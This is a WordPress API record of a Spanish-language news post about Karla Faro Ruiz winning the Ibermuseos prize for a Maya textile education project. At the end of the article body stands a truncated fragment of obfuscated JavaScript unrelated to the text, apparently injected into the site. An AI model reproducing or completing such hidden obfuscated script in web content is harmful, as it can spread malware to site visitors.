{"id":25627,"date":"2025-12-06T05:53:15","date_gmt":"2025-12-06T05:53:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25627"},"modified":"2025-12-06T05:53:16","modified_gmt":"2025-12-06T05:53:16","slug":"karla-faro-ruiz-obtiene-el-premio-internacional-ibermuseos-por-proyecto-educativo-textil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25627","title":{"rendered":"Karla Faro Ruiz obtiene el Premio Internacional Ibermuseos por proyecto educativo textil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"611\" height=\"338\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000477909.jpg\" alt=\"\" class=\"wp-image-25628\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000477909.jpg 611w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000477909-300x166.jpg 300w\" sizes=\"auto, (max-width: 611px) 100vw, 611px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>5 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- La coordinadora del Centro de Textiles del Mundo Maya, Karla Faro Ruiz, fue distinguida con el Premio Internacional Ibermuseos, gracias a su proyecto educativo \u201cJugando con el Universo Textil Maya\u201d, una iniciativa que promueve el conocimiento y valoraci\u00f3n de la tradici\u00f3n textil en las nuevas generaciones.<\/p>\n\n\n\n<p>Durante su participaci\u00f3n en el recinto cultural, Faro Ruiz resalt\u00f3 el valor comunitario de este reconocimiento e insisti\u00f3 en la importancia de fortalecer los v\u00ednculos entre museos, artesanos y p\u00fablicos diversos.<\/p>\n\n\n\n<p>Asimismo, inform\u00f3 que el tintorero y tejedor Francisco \u00c1lvarez Montoya recibi\u00f3 el nombramiento de Tesoro Humano Vivo, al ser reconocido como el \u00faltimo maestro que conserva el oficio de tejido con a\u00f1il en la regi\u00f3n, pr\u00e1ctica ancestral que ha transmitido durante d\u00e9cadas.<\/p>\n\n\n\n<p>La coordinadora subray\u00f3 que este reconocimiento nacional demuestra la urgencia de proteger los saberes tradicionales, especialmente aquellos en riesgo de desaparici\u00f3n, pues representan una parte esencial del patrimonio cultural del pa\u00eds.<\/p>\n\n\n\n<p>Finalmente, anunci\u00f3 que se encuentra abierta en el Centro de Textiles del Mundo Maya una exposici\u00f3n fotogr\u00e1fica integrada por obras de aficionados y profesionales que participaron en la 3\u00aa edici\u00f3n del Certamen Nacional Fotogr\u00e1fico \u201cEl M\u00e9xico de los Mexicanos\u201d, la cual permanecer\u00e1 disponible para el p\u00fablico en los pr\u00f3ximos d\u00edas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal5 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- La coordinadora del Centro de Textiles del Mundo Maya, Karla Faro Ruiz, fue distinguida con el Premio Internacional Ibermuseos, gracias a su proyecto educativo \u201cJugando con el Universo Textil Maya\u201d, una iniciativa que promueve el conocimiento y valoraci\u00f3n de la tradici\u00f3n textil en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25628,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25627","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25627"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25627\/revisions"}],"predecessor-version":[{"id":25629,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25627\/revisions\/25629"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25628"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25627"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25627"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}